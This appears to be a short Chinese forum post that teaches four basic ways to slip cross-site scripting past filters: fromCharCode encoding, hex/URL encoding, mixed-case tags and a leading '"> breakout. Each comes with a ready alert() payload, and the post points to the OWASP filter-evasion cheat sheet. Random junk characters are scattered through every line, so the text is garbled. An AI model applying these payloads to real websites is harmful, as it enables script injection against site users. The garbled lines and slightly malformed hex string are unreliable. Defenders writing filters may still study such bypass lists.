四种超级基础的绕过方法。
9 E! O2 T! G2 b0 l! _4 d1.转换为ASCII码
! F, h5 U4 {) [& n0 b' K例子:原脚本为<script>alert(‘I love F4ck’)</script >
6 g+ }# Q3 m( c8 d1 ?/ \通过转换,变成:" W3 ? z; u; E4 r
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>& D5 G, s1 w$ j
! y+ M: x: B; l! R2.转换为HEX(十六进制)
( h; @: ]2 B) E; h例子:原脚本为<script>alert(‘I love F4ck’)</script>+ W4 n0 z0 w; c$ k% z0 A
通过转换,变成:1 F. b _+ I) _: d
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e U$ U- N" D! i% U% b
9 B0 t/ ^- a. C X4 s" P4 n" {2 [& Y; Q
3.转换脚本的大小写, _0 v. I, ~" d, c( F
例子:原脚本为<script>alert(‘I love F4ck’)</script>+ v+ o! ~ g7 e' E5 V( ~ t
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT> H5 U) A" Q0 F$ X) o
2 K5 N2 X! Q( |& a7 n6 |; q
4.增加闭合标记”>
7 d! S% k6 X3 {1 }6 R2 p例子:原脚本为<script>alert(‘I love F4ck’)</script>
g6 v6 q' `7 q& j6 E; M3 B转换为:”><script>alert(‘I love F4ck’)</script>
N* K( {$ f" z! q: ^- B( A) M- y更详细绕过技术请参考此网页' V- S9 i/ l5 S. Y) J x9 p
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet; O* g, }4 Y1 S7 a
. c+ g8 G, g0 P转换工具使用的是火狐的 hackbar mozilla addon. |